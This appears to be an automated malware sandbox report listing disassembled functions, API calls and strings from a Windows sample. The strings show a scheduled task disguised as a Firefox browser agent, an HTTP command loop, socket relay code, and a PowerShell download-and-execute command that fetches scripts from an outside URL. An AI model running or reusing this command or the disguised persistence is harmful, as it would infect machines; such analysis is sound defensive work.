Opcode ID: 60234127b79b5e41f21665ddf53bbce976eeb6cc314f51b0b5718c84ed72c4a4
Instruction ID: c5c2e586fcf8f322b5b0f5715b247147e5cf0eff7f4aa2dbac810aab73d0b0e7
Opcode Fuzzy Hash: 60234127b79b5e41f21665ddf53bbce976eeb6cc314f51b0b5718c84ed72c4a4
Instruction Fuzzy Hash:

Function 00BD7710 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

0, xrefs: 00BD7770

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 41377a65c8464930f3900d225757f879d78da9450391cff75ba1eb08b047bb64
Instruction ID: d4575a8e0aa4950bb74fd5f41379115be53dbe9e4299aaf79c5ac4ba5e8e34b8
Opcode Fuzzy Hash: 41377a65c8464930f3900d225757f879d78da9450391cff75ba1eb08b047bb64
Instruction Fuzzy Hash: 3251C331D192D84EDB1D8BED88542ECBFB19F56200F5441FED896A7782D9284A09CB61

Function 00D1B939 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00D1B939

Memory Dump Source

Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: bc913d62ec2f6126fa3789c195fc5f69592aaec70c00e32ee9487e25ea047c21
Instruction ID: b18f3e831ad8a8a419145a9af1b78ed89a97ca4a97a61302eb7ff5dae1c2da38
Opcode Fuzzy Hash: bc913d62ec2f6126fa3789c195fc5f69592aaec70c00e32ee9487e25ea047c21
Instruction Fuzzy Hash: 64A012303003018F43608F319A1630E35A8555059030040545004C0220DA3445124F21

Function 00BD47D0 Relevance: .8, Instructions: 750COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df13ecf6b857fba0f51fa2fc3b7ec52def9905d6387d66609c694c65ae35e659
Instruction ID: e557c6f2b0bddb72e03d5e500710c7cbbe4ffbc562f1a3fb1ca152e3324f3d92
Opcode Fuzzy Hash: df13ecf6b857fba0f51fa2fc3b7ec52def9905d6387d66609c694c65ae35e659
Instruction Fuzzy Hash: 91720A348241998ADB18EB64D8A57ECB7B4BF22700F4411FED48A12A57BF711B89CF61

Function 00BD43D0 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
Instruction ID: 30c601da28732d0c86addaa5ccfa9ad3a7112a4d71085d051946d182f3a63628
Opcode Fuzzy Hash: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
Instruction Fuzzy Hash: D95164B1A11A10CFCB68CF2EC591556BBF1BF8C324355896EA98ACB625E334F840CF51

Function 00BD6D50 Relevance: 70.4, APIs: 31, Strings: 9, Instructions: 426
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 00BD6D6E
CoCreateInstance.OLE32(00BD1020,00000000,00000001,00BD1000,?), ref: 00BD6D9B
SysAllocString.OLEAUT32(00BD1498), ref: 00BD6DE1
SysFreeString.OLEAUT32(?), ref: 00BD6E1E
SysAllocString.OLEAUT32(\Mozilla), ref: 00BD6E2F
SysFreeString.OLEAUT32(00000000), ref: 00BD6E51
SysAllocString.OLEAUT32(\Mozilla), ref: 00BD6E62
SysFreeString.OLEAUT32(00000000), ref: 00BD6E78
SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 00BD6E86
SysFreeString.OLEAUT32(00000000), ref: 00BD6E97
SysAllocString.OLEAUT32(The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic), ref: 00BD6ED4
SysFreeString.OLEAUT32(00000000), ref: 00BD6EE3
SysAllocString.OLEAUT32(Mozilla), ref: 00BD6EEA
SysFreeString.OLEAUT32(00000000), ref: 00BD6EF9
SysAllocString.OLEAUT32(PT0S), ref: 00BD6F4E
SysFreeString.OLEAUT32(00000000), ref: 00BD6F5D
SysAllocString.OLEAUT32(Trigger1), ref: 00BD6FCF
SysFreeString.OLEAUT32(00000000), ref: 00BD6FDE
SysAllocString.OLEAUT32(2023-01-01T12:00:00), ref: 00BD6FE5
SysFreeString.OLEAUT32(00000000), ref: 00BD6FF4
SysAllocString.OLEAUT32(PT1M), ref: 00BD7013
SysFreeString.OLEAUT32(00000000), ref: 00BD7022
SysAllocString.OLEAUT32(C:\Windows\System32\wscript.exe), ref: 00BD70A3
SysFreeString.OLEAUT32(00000000), ref: 00BD70B2
SysAllocString.OLEAUT32(?), ref: 00BD70BC
SysFreeString.OLEAUT32(00000000), ref: 00BD70CB
VariantInit.OLEAUT32(?), ref: 00BD70FA
SysAllocString.OLEAUT32(00BD113C), ref: 00BD710E
SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 00BD711F
SysFreeString.OLEAUT32(00000000), ref: 00BD715C
VariantClear.OLEAUT32(?), ref: 00BD7162

Strings

C:\Windows\System32\wscript.exe, xrefs: 00BD709E
Trigger1, xrefs: 00BD6FCA
2023-01-01T12:00:00, xrefs: 00BD6FE0
The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic, xrefs: 00BD6ECF
\Mozilla, xrefs: 00BD6E2A, 00BD6E5D
Firefox Default Browser Agent 318146B0AF4A39CB, xrefs: 00BD6E81, 00BD7110
PT0S, xrefs: 00BD6F49
Mozilla, xrefs: 00BD6EE5
PT1M, xrefs: 00BD700E

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: String$Alloc$Free$Variant$Init$ClearCreateInstance
String ID: 2023-01-01T12:00:00$C:\Windows\System32\wscript.exe$Firefox Default Browser Agent 318146B0AF4A39CB$Mozilla$PT0S$PT1M$The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic$Trigger1$\Mozilla
API String ID: 3904693211-3377861604
Opcode ID: 95c3f2fe5b13c293039b55f497451dcf5fd1de66a8cb251bfe6d1973421107b3
Instruction ID: 0a0641ef3564ffc35d59cb1055a1ade857b4a35a417d4905b5cbdb2a53a0afab
Opcode Fuzzy Hash: 95c3f2fe5b13c293039b55f497451dcf5fd1de66a8cb251bfe6d1973421107b3
Instruction Fuzzy Hash: F4F1FB70A00219AFDB14DBA9C858FAEBBF9FF49304F104199F505EB260EB71AD45CB61

Function 00BD8120 Relevance: 61.6, APIs: 21, Strings: 14, Instructions: 350
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00BD8146
GetTickCount64.KERNEL32 ref: 00BD8154

Part of subcall function 00BD6830: ObtainUserAgentString.URLMON(00000000,?,00BD9478), ref: 00BD6852
Part of subcall function 00BD6830: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00BD6872
Part of subcall function 00BD6830: InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BD68D8
Part of subcall function 00BD6830: InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 00BD691B
Part of subcall function 00BD6830: InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BD6938
Part of subcall function 00BD6830: HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 00BD6971
Part of subcall function 00BD6830: InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00BD699A

Sleep.KERNEL32(00000000), ref: 00BD81A6
lstrcmpA.KERNEL32(00000000,INIT), ref: 00BD81B3
StrToIntA.SHLWAPI(00000000), ref: 00BD8276
StrToIntA.SHLWAPI(00000000), ref: 00BD82BB
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00BD82F7
PathCombineW.SHLWAPI(?,?,WindowsPowerShell\v1.0\powershell.exe), ref: 00BD8310
wnsprintfW.SHLWAPI ref: 00BD8324
ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 00BD8360
wnsprintfW.SHLWAPI ref: 00BD8374

Part of subcall function 00BD5780: GetProcessHeap.KERNEL32(00000000,00000000,00BD86C5), ref: 00BD5787
Part of subcall function 00BD5780: HeapFree.KERNEL32(00000000), ref: 00BD578E

GetModuleHandleA.KERNEL32(kernel32), ref: 00BD8397
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BD83A5
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BD83BA
LoadLibraryA.KERNEL32(shell32,ShellExecuteW), ref: 00BD841B
GetProcAddress.KERNEL32(00000000), ref: 00BD8422
wsprintfA.USER32 ref: 00BD8482
wnsprintfA.SHLWAPI ref: 00BD84AE

Part of subcall function 00BD2960: GetProcessHeap.KERNEL32(00000008,?), ref: 00BD2972
Part of subcall function 00BD2960: HeapAlloc.KERNEL32(00000000), ref: 00BD2979

Sleep.KERNEL32(00000000), ref: 00BD86D6

Strings

Wow64RevertWow64FsRedirection, xrefs: 00BD83AB
/c %S, xrefs: 00BD836A
%d|%s, xrefs: 00BD8140
INIT, xrefs: 00BD81AD
open, xrefs: 00BD8430
%ComSpec%, xrefs: 00BD835B
kernel32, xrefs: 00BD8384
ShellExecuteW, xrefs: 00BD8411
%s|%s, xrefs: 00BD84A4
shell32, xrefs: 00BD8416
Wow64DisableWow64FsRedirection, xrefs: 00BD839F
-enc %S, xrefs: 00BD831A
WindowsPowerShell\v1.0\powershell.exe, xrefs: 00BD82FD
%d|%s|%.16s|, xrefs: 00BD847C

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: HeapInternet$AddressProcwnsprintf$OpenOptionProcessSleepwsprintf$AgentAllocByteCharCombineConnectCount64DirectoryEnvironmentExpandFreeHandleHttpLibraryLoadModuleMultiObtainPathQueryRequestStringStringsSystemTickUserWidelstrcmp
String ID: -enc %S$ /c %S$%ComSpec%$%d|%s$%d|%s|%.16s|$%s|%s$INIT$ShellExecuteW$WindowsPowerShell\v1.0\powershell.exe$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32$open$shell32
API String ID: 1920831074-1153165106
Opcode ID: 6fbaa22846674a4b1918153a6e7d77a5eccbaca54f85979a12db5fe74cafb8d7
Instruction ID: 71fb68ed29b503cf200badc0651c911d7f144b979857a93c4d463bb466c07b3c
Opcode Fuzzy Hash: 6fbaa22846674a4b1918153a6e7d77a5eccbaca54f85979a12db5fe74cafb8d7
Instruction Fuzzy Hash: A2C18D71E00204EBCB14EBA8DC95AAEF7F5AF44301F1405ABE906A7391FF749E048B94

Function 00BD8900 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 69stringCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe,?,00000104), ref: 00BD8921
ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe,?,00000104), ref: 00BD8934
ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 00BD8947
GetFileAttributesW.KERNEL32(?), ref: 00BD896D
GetFileAttributesW.KERNEL32(?), ref: 00BD8986
lstrcpyW.KERNEL32(00000000,sd4.ps1), ref: 00BD899D
wnsprintfW.SHLWAPI ref: 00BD89C0
ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 00BD89E2

Strings

/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')", xrefs: 00BD89AF
https://www.wilkinsonbeane.com/css/slider, xrefs: 00BD89AA
open, xrefs: 00BD89DB
%ComSpec%, xrefs: 00BD8942
%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe, xrefs: 00BD892F
sd4.ps1, xrefs: 00BD8991
sd2.ps1, xrefs: 00BD8978
%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe, xrefs: 00BD891C

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings$AttributesFile$ExecuteShelllstrcpywnsprintf
String ID: %ComSpec%$%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe$%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe$/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"$https://www.wilkinsonbeane.com/css/slider$open$sd2.ps1$sd4.ps1
API String ID: 4132772799-3770388065
Opcode ID: f75d5354c7c1e9aed9d69c2ef26f7d1d90b92e022a20ddf8b0966a1c46870405
Instruction ID: 61ca7a1ebf6fbb680aacd55c37e35184eaaabea127df12e978f57d37881dc7b6
Opcode Fuzzy Hash: f75d5354c7c1e9aed9d69c2ef26f7d1d90b92e022a20ddf8b0966a1c46870405
Instruction Fuzzy Hash: 9321CF7194021CABDB10DBA88C55FFAF7ACEB04714F0019D3EA98E21D0FBB45A848B91

Function 00BD5850 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 167memorypipeprocessCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32(?,?,?,00000000), ref: 00BD5883
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD58E1
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD58F4
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD58F9
WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD5910
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD5927
ReadFile.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD5964
GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD598F
HeapAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD5992
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD599D
HeapReAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD59A0
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD59F7
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD5A13
CloseHandle.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00BD5A18

Strings

D, xrefs: 00BD58A6

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: CloseHandleHeap$PipeProcess$AllocCreateNamedPeek$FileObjectReadSingleWait
String ID: D
API String ID: 2337985897-2746444292
Opcode ID: 70c0fc5ed73fe27c01dbfff7affbdebd7f6031266bb6c25af88a1a87be492e8a
Instruction ID: 79caa03b8022066658b5337bfe227715ff3502c5a96150191f5d28e8b3135032
Opcode Fuzzy Hash: 70c0fc5ed73fe27c01dbfff7affbdebd7f6031266bb6c25af88a1a87be492e8a
Instruction Fuzzy Hash: BB517375A00219EFEB208FA5DC94FAFFBB9FF44714F1444A6E914E7290EB7498048B64

Function 00BD6410 Relevance: 25.6, APIs: 17, Instructions: 148networkmemoryCOMMON

Download Yara Rule

APIs

inet_pton.WS2_32(00000002,?,?), ref: 00BD6430
htons.WS2_32(?), ref: 00BD644C
inet_pton.WS2_32(00000002,?,?), ref: 00BD645E
htons.WS2_32(?), ref: 00BD6465
socket.WS2_32(00000002,00000001,00000006), ref: 00BD6478
connect.WS2_32(00000000,?,00000010), ref: 00BD6493
socket.WS2_32(00000002,00000001,00000006), ref: 00BD64A6
connect.WS2_32(00000000,?,00000010), ref: 00BD64BB
closesocket.WS2_32(00000000), ref: 00BD64C3
select.WS2_32(00000000,?), ref: 00BD64F8
recv.WS2_32(?,?,00000400,00000000), ref: 00BD6534
send.WS2_32(00000000,?,00000000,00000000), ref: 00BD655A
select.WS2_32(00000000,00000002,00000000,00000000,00000000), ref: 00BD658C
closesocket.WS2_32(00000000), ref: 00BD65A6
closesocket.WS2_32(00000000), ref: 00BD65AD
GetProcessHeap.KERNEL32(00000000,?), ref: 00BD65B9
HeapFree.KERNEL32(00000000), ref: 00BD65C0

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: closesocket$Heapconnecthtonsinet_ptonselectsocket$FreeProcessrecvsend
String ID:
API String ID: 2202494921-0
Opcode ID: 8fb5472fa3e5c5d6bc32117c70dd37ed672275c54cdba27c019fc80058fe10e4
Instruction ID: c987a255a552733a36935fa2e2aeaf6242e2ccd6ecb1a69b9a45aaee6ba3bb43
Opcode Fuzzy Hash: 8fb5472fa3e5c5d6bc32117c70dd37ed672275c54cdba27c019fc80058fe10e4
Instruction Fuzzy Hash: C351AD71105304ABD2109F64DC89F6EF7E8FB88B24F110A1BF654E72E0EBB0D9458B66

Function 00BD7570 Relevance: 22.6, APIs: 15, Instructions: 131memorynetworkthreadCOMMON

Download Yara Rule

APIs

inet_pton.WS2_32(00000002,?,?), ref: 00BD7583
htons.WS2_32(?), ref: 00BD758E
socket.WS2_32(00000002,00000001,00000006), ref: 00BD75A6
connect.WS2_32(00000000,?,00000010), ref: 00BD75C4
recv.WS2_32(00000000,?,00000002,00000000), ref: 00BD75DC
GetProcessHeap.KERNEL32(00000008,00000024), ref: 00BD75FD
HeapAlloc.KERNEL32(00000000), ref: 00BD7600
CreateThread.KERNEL32(00000000,00000000,Function_00006410,00000000,00000000,00000000), ref: 00BD767B
CloseHandle.KERNEL32(00000000), ref: 00BD7686
recv.WS2_32(00000000,?,00000002,00000000), ref: 00BD769E
closesocket.WS2_32(00000000), ref: 00BD76AD
GetProcessHeap.KERNEL32(00000000,?), ref: 00BD76B6
HeapFree.KERNEL32(00000000), ref: 00BD76B9
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BD76D3
HeapFree.KERNEL32(00000000), ref: 00BD76D6

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Heap$Process$Freerecv$AllocCloseCreateHandleThreadclosesocketconnecthtonsinet_ptonsocket
String ID:
API String ID: 2784442062-0
Opcode ID: cabab0230bde8d610161e5ec67a4c8470c5cb3c00e1658b6eb21ae08aad667fd
Instruction ID: 4115808b0bde36d7d83cc38394a9b86b80608985497ec2f8ed445e80f3735122
Opcode Fuzzy Hash: cabab0230bde8d610161e5ec67a4c8470c5cb3c00e1658b6eb21ae08aad667fd
Instruction Fuzzy Hash: DD41B034A45745AAD7208F788C59FABBBA8EF05B11F14019BFA059B291FB70D84187A4

Function 00BD6B20 Relevance: 15.1, APIs: 12, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00BDA090), ref: 00BD6B31
StrCmpNIA.SHLWAPI(?,?,00000000), ref: 00BD6B6A
LeaveCriticalSection.KERNEL32(00BDA090,00000000), ref: 00BD6B86
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BD6BE0
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BD6BE7
LeaveCriticalSection.KERNEL32(00BDA090,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BD6BFD
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BD6C17
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BD6C1E
LeaveCriticalSection.KERNEL32(00BDA090,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BD6C2F
GetProcessHeap.KERNEL32(00000008,?,?), ref: 00BD6C3B
HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BD6C42
LeaveCriticalSection.KERNEL32(00BDA090), ref: 00BD6C53

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Heap$CriticalSection$Leave$Process$Alloc$EnterFree
String ID:
API String ID: 2132424838-0
Opcode ID: d4c24263c4b606809c09dc994a63d9c30eb3a07ebb0a2d72add637dfba9eb9e0
Instruction ID: 52127c343592038746a324a6fda131aff9cbf9a2e78d115bb9833d2ea88650bb
Opcode Fuzzy Hash: d4c24263c4b606809c09dc994a63d9c30eb3a07ebb0a2d72add637dfba9eb9e0
Instruction Fuzzy Hash: 0831BEB6602200DFD7245FA4EC68F6AFBA5FB94712F0940ABE141D72A0FF3084008711

Function 00BD71A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 120registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 00BD71CA
RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 00BD71E6
GetProcessHeap.KERNEL32(00000008,?), ref: 00BD71F9
HeapAlloc.KERNEL32(00000000), ref: 00BD7200
RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 00BD721D
RegCloseKey.ADVAPI32(80000002), ref: 00BD7229

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 00BD71C0
MachineGuid, xrefs: 00BD71DE, 00BD7215

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: HeapQueryValue$AllocCloseOpenProcess
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2639912721-1211650757
Opcode ID: 2023657b28cc42f4e89e4a245326aa40c1e08026af260d9ed047562c044f2eed
Instruction ID: f2cfbdd7c9bb3ee5434e54d7bfe9cbe433a1c98eca2fef17c75bf4aba0bb6944
Opcode Fuzzy Hash: 2023657b28cc42f4e89e4a245326aa40c1e08026af260d9ed047562c044f2eed
Instruction Fuzzy Hash: 83318D35E89259AADB318BA4CC85BEFFBF9FF56700F65449BE84193350FB7099408290

Function 00D161EB Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00D1630A
___TypeMatch.LIBVCRUNTIME ref: 00D16418
CallUnexpected.LIBVCRUNTIME ref: 00D16585

Strings

csm, xrefs: 00D16341
csm, xrefs: 00D16228
csm, xrefs: 00D16295

Memory Dump Source

Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd

Similarity

API ID: CallMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 1206542248-393685449
Opcode ID: 6459e2f8511dafef2ee68d36d5dd2e770484cc02a4ab8f4f9fb42eb2cba54af9
Instruction ID: 44e685f591335fab9410e06b7b1b637a7133df140f7453c7ba42e292f83a71ec
Opcode Fuzzy Hash: 6459e2f8511dafef2ee68d36d5dd2e770484cc02a4ab8f4f9fb42eb2cba54af9
Instruction Fuzzy Hash: 20B15671800209FFCF29DFA4E9819EEBBB5FF44310B18415AE8116B216DB35DA91CBB1

Function 00BD6670 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 167memorynetworkCOMMON

Download Yara Rule

APIs

InternetCrackUrlW.WININET(00BDA114,00000000,00000000,0000003C), ref: 00BD66D5
GetProcessHeap.KERNEL32(00000008,00000001,00BDA114), ref: 00BD66F7
